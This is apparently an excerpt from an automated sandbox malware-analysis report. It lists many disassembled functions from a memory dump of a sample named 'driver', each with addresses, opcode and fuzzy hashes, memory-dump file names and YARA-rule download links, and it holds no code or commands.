                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 63077e8bcab2b7f2f6a8c1425cc33a1d16c0ea949bb5305bcf900d5818eac0f0
                                                                                                                                                                    • Instruction ID: 4e056189f57d76fff570c8a22c12fc67a3fb1fc865e2375091feebb40ff0aff4
                                                                                                                                                                    • Opcode Fuzzy Hash: 63077e8bcab2b7f2f6a8c1425cc33a1d16c0ea949bb5305bcf900d5818eac0f0
                                                                                                                                                                    • Instruction Fuzzy Hash: 29D0A733684A155BD708A56E5CD19D7428D4FC8324B24983B780CE92139D5DCC900058
                                                                                                                                                                    Function 0042BB7C Relevance: .0, Instructions: 17COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000028.00000002.20431935441.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000028.00000002.20431899656.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000444000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.000000000044B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000455000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.0000000000458000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.000000000045A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_40_2_400000_driver.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 51ff537a08fef63bdf0c96cc0ed5d46502602bc2c446dd0ee6c75f0330d2bcbf
                                                                                                                                                                    • Instruction ID: a619144f9a1db721b251a750263a3a64a9ca69730360dbf5ddc471f4c11953c5
                                                                                                                                                                    • Opcode Fuzzy Hash: 51ff537a08fef63bdf0c96cc0ed5d46502602bc2c446dd0ee6c75f0330d2bcbf
                                                                                                                                                                    • Instruction Fuzzy Hash: 46D0C27520055CA78E00DB44BD128723369E6063057884073FA0C4523BE7786948CBCD
                                                                                                                                                                    Function 00403388 Relevance: .0, Instructions: 17COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000028.00000002.20431935441.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000028.00000002.20431899656.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000444000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.000000000044B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000455000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.0000000000458000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.000000000045A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_40_2_400000_driver.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CreateErrorFileLast
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1214770103-0
                                                                                                                                                                    • Opcode ID: a2f52ccab64719e7afa76369a713213d450213ed8f077c1c02f7758d8ccadb7f
                                                                                                                                                                    • Instruction ID: 66e0fa2e3a90dd7c0a30124f68f378ee94c85c300db0f6f6b67e7a1c9ca2838a
                                                                                                                                                                    • Opcode Fuzzy Hash: a2f52ccab64719e7afa76369a713213d450213ed8f077c1c02f7758d8ccadb7f
                                                                                                                                                                    • Instruction Fuzzy Hash: BCC0125030124012E610AD720CC271A42454784716E6468BFB500AF3C7C97AD9062218
                                                                                                                                                                    Function 00403104 Relevance: .0, Instructions: 15COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000028.00000002.20431935441.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000028.00000002.20431899656.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000444000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.000000000044B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000455000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.0000000000458000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.000000000045A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_40_2_400000_driver.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorFileLastPointer
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2976181284-0
                                                                                                                                                                    • Opcode ID: 07a768561cad142c1aa7794b02966dab1ac288d4e469a79c7aba686b3edb87c6
                                                                                                                                                                    • Instruction ID: 793c961b23b6e2a0f2f7aebb39b9a0a66ec00683b16976a0d3993fe2934fbe84
                                                                                                                                                                    • Opcode Fuzzy Hash: 07a768561cad142c1aa7794b02966dab1ac288d4e469a79c7aba686b3edb87c6
                                                                                                                                                                    • Instruction Fuzzy Hash: 8AD092B17016208B9B14DF6E84C0595FBE8AF8D611754C1BBA80CDB30AD27489018BA0
                                                                                                                                                                    Function 0043B50C Relevance: .0, Instructions: 12COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000028.00000002.20431935441.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000028.00000002.20431899656.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000444000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.000000000044B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000455000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.0000000000458000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.000000000045A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_40_2_400000_driver.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 4d7292b9a0a44aa357acae6feb8a9ad490f7f9c1151ca0d3056356f6e80b5be7
                                                                                                                                                                    • Instruction ID: f52d716bde895b6920b8f7f0e0c113cb1ad6b026cd84a71efd87d35720a9b92a
                                                                                                                                                                    • Opcode Fuzzy Hash: 4d7292b9a0a44aa357acae6feb8a9ad490f7f9c1151ca0d3056356f6e80b5be7
                                                                                                                                                                    • Instruction Fuzzy Hash: 4DC09B21359309755A0055F59841F3733CCC91C75CF103417F609CE501F719F94055DE
                                                                                                                                                                    Function 0043B3A8 Relevance: .0, Instructions: 11COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000028.00000002.20431935441.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000028.00000002.20431899656.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000444000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.000000000044B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000455000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.0000000000458000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.000000000045A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_40_2_400000_driver.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 9723f004397c6385129a260c96cf55e711812be9d6c43eabd64b4f2dd1f31f0e
                                                                                                                                                                    • Instruction ID: bb59fec24ae155195337589753c246b05886390ccb239ed57b2942dbb84cf2a4
                                                                                                                                                                    • Opcode Fuzzy Hash: 9723f004397c6385129a260c96cf55e711812be9d6c43eabd64b4f2dd1f31f0e
                                                                                                                                                                    • Instruction Fuzzy Hash: 95B09B6114831C555A1155D5B441F2637CCCF08654F90701BFE0887101E76DF65011DF
                                                                                                                                                                    Function 0043AD68 Relevance: .0, Instructions: 11COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000028.00000002.20431935441.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000028.00000002.20431899656.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000444000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.000000000044B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000455000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.0000000000458000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.000000000045A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_40_2_400000_driver.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 7a9ee577dfe82d61fcb6245e0e699efafc2807a3f8b6d2643be57a6dbe8a6997
                                                                                                                                                                    • Instruction ID: abd9243635777177f13608d5b93e4fc63c7750df3c5c69ed3e96bf4374a32ea5
                                                                                                                                                                    • Opcode Fuzzy Hash: 7a9ee577dfe82d61fcb6245e0e699efafc2807a3f8b6d2643be57a6dbe8a6997
                                                                                                                                                                    • Instruction Fuzzy Hash: B5C02B3308830C6BC60467D6F806989378CCB0A320F00801AF10C86482CDB3B040019F
                                                                                                                                                                    Function 00415BB0 Relevance: .0, Instructions: 10COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000028.00000002.20431935441.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000028.00000002.20431899656.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000444000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.000000000044B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000455000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.0000000000458000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.000000000045A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_40_2_400000_driver.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: d2f97f8ea061e0f029b09ad3e9e86269dc7190bd90767021fdb5a0b8a233165d
                                                                                                                                                                    • Instruction ID: 0a86cdb1ad437ea8e48a1d8e3ad4de21f525cce57220df920075e48049fa20e1
                                                                                                                                                                    • Opcode Fuzzy Hash: d2f97f8ea061e0f029b09ad3e9e86269dc7190bd90767021fdb5a0b8a233165d
                                                                                                                                                                    • Instruction Fuzzy Hash: FBC09BF15443008EDB405FE664C975163E4574C335F14D06FE65C9E147D77C54908E2D
                                                                                                                                                                    Function 00440F0C Relevance: .0, Instructions: 10COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000028.00000002.20431935441.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000028.00000002.20431899656.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000444000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.000000000044B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000455000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.0000000000458000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.000000000045A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_40_2_400000_driver.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 63f704d50bddd1acc1256425e49db7bdb7f3c5eea37efbb4083c621bd0be3d00
                                                                                                                                                                    • Instruction ID: 32c719d24f44432ea02af8058b348b6ff6a580bc2cc2625258898bf1414627e0
                                                                                                                                                                    • Opcode Fuzzy Hash: 63f704d50bddd1acc1256425e49db7bdb7f3c5eea37efbb4083c621bd0be3d00
                                                                                                                                                                    • Instruction Fuzzy Hash: E0B092B268430826E940A589AC03F6633AC4744A04F100011BF0C4A281E4A1B96081AA
                                                                                                                                                                    Function 00415ADC Relevance: .0, Instructions: 9COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000028.00000002.20431935441.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000028.00000002.20431899656.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000444000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.000000000044B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000455000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.0000000000458000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.000000000045A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_40_2_400000_driver.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: e33aedac80d0062c1e6161624d1bcfdfec9dda8f8c279d4ff00cbde402164fd9
                                                                                                                                                                    • Instruction ID: 49b24f1a4e3d92c7f618e32a1ecc4f0d0c0e924aa8cf248c82b67e82188b51e4
                                                                                                                                                                    • Opcode Fuzzy Hash: e33aedac80d0062c1e6161624d1bcfdfec9dda8f8c279d4ff00cbde402164fd9
                                                                                                                                                                    • Instruction Fuzzy Hash: 9FB012A13492000FA7805FED6CC671193D4B70C315B24807FF54CCF286DA508C548625
                                                                                                                                                                    Function 0043ACD0 Relevance: .0, Instructions: 8COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000028.00000002.20431935441.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000028.00000002.20431899656.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000444000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.000000000044B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000455000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.0000000000458000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.000000000045A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_40_2_400000_driver.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 1ba04fd99e5e84448f359d2414dff74ceb16490147f4acb0543988b9f3d33726
                                                                                                                                                                    • Instruction ID: edd0f2000a5a0280c41ad05bc7849167ae62e9a9659831f3cc196b8081b343ce
                                                                                                                                                                    • Opcode Fuzzy Hash: 1ba04fd99e5e84448f359d2414dff74ceb16490147f4acb0543988b9f3d33726
                                                                                                                                                                    • Instruction Fuzzy Hash: F5B0127740830C9BCA045BD9F80988677DCD60A5107018025F50D93501DA72F400469A
                                                                                                                                                                    Function 0043ACE0 Relevance: .0, Instructions: 8COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000028.00000002.20431935441.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000028.00000002.20431899656.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000444000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.000000000044B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000455000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.0000000000458000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.000000000045A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_40_2_400000_driver.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: aa7837693ccbcb3965ce62620baeb3772eb84246039d30ef26f9082658ebf36e
                                                                                                                                                                    • Instruction ID: dcc38b4a470782e88e94b56a8137f2e365269cf874ad56e6fdc16fd797955003
                                                                                                                                                                    • Opcode Fuzzy Hash: aa7837693ccbcb3965ce62620baeb3772eb84246039d30ef26f9082658ebf36e
                                                                                                                                                                    • Instruction Fuzzy Hash: BBB0123650830C9BCB045BD8F8098C537ECD60A5217014025F50C93500DA71F440479B
                                                                                                                                                                    Function 0043A548 Relevance: .0, Instructions: 8COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000028.00000002.20431935441.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000028.00000002.20431899656.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000444000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.000000000044B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000455000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.0000000000458000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.000000000045A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_40_2_400000_driver.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 411d7b25b7741598cf03863e25d24bf48610486a3c99f02e8a0c5b63dfa1e3f7
                                                                                                                                                                    • Instruction ID: bd9dafff2fe6d6da9a352b4bd8c7a277e7613d5f112b1e06bac9dad846666664
                                                                                                                                                                    • Opcode Fuzzy Hash: 411d7b25b7741598cf03863e25d24bf48610486a3c99f02e8a0c5b63dfa1e3f7
                                                                                                                                                                    • Instruction Fuzzy Hash: 9DB0123208830C17490065D9A403C4533CC5508554B001006B50C47101D825F45001DD
                                                                                                                                                                    Function 0043A558 Relevance: .0, Instructions: 8COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000028.00000002.20431935441.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000028.00000002.20431899656.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000444000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.000000000044B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000455000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.0000000000458000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.000000000045A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_40_2_400000_driver.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 9bf335d133c4b31dda3cd4321ebe01e027f16d910011cf46f64424cf97510dd2
                                                                                                                                                                    • Instruction ID: f46deb5ea20315547d97862b23a9f74c6acf8539ef61920139e7061bb41898c2
                                                                                                                                                                    • Opcode Fuzzy Hash: 9bf335d133c4b31dda3cd4321ebe01e027f16d910011cf46f64424cf97510dd2
                                                                                                                                                                    • Instruction Fuzzy Hash: 31B0123208830C26490065D9A40285533CC4508514B500006B50C47101D825F5500199
                                                                                                                                                                    Function 0043B51A Relevance: .0, Instructions: 8COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000028.00000002.20431935441.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000028.00000002.20431899656.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000444000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.000000000044B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000455000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.0000000000458000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.000000000045A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_40_2_400000_driver.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 0ae2d3e606c1ceabb6b4a6491b6d521cfbf0af0aa0bbd1ec1bf0b7c842c436df
                                                                                                                                                                    • Instruction ID: b330b63fd5db91ff1a71419f2fbc03c20ebc1e8b280022b847837893a521fda3
                                                                                                                                                                    • Opcode Fuzzy Hash: 0ae2d3e606c1ceabb6b4a6491b6d521cfbf0af0aa0bbd1ec1bf0b7c842c436df
                                                                                                                                                                    • Instruction Fuzzy Hash: 03A0025244520424580431B1741B526124DC45422CB10644FB1084A5939D5E5550545D
                                                                                                                                                                    Function 0043A71C Relevance: .0, Instructions: 8COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000028.00000002.20431935441.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000028.00000002.20431899656.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000444000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.000000000044B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000455000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.0000000000458000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.000000000045A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_40_2_400000_driver.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: a58a07f6604102c237335ac962d82106959492ee94c454b5c2be7e9bb7cb94ed
                                                                                                                                                                    • Instruction ID: 2afe9c15fc64520705900ff93814ec457c79bd13f8e21df0e69a06f477630270
                                                                                                                                                                    • Opcode Fuzzy Hash: a58a07f6604102c237335ac962d82106959492ee94c454b5c2be7e9bb7cb94ed
                                                                                                                                                                    • Instruction Fuzzy Hash: 4AB0123244830C26490065DDA40684637CC450C514B000006B50C47111D826F550859D
                                                                                                                                                                    Function 0043B3B4 Relevance: .0, Instructions: 7COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000028.00000002.20431935441.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000028.00000002.20431899656.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000444000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.000000000044B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000455000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.0000000000458000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.000000000045A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_40_2_400000_driver.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: FreeVirtual
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1263568516-0
                                                                                                                                                                    • Opcode ID: f93ad5f00a56466d27291db40c1105638db8132c28aa5f83f4a226fdc7faddfc
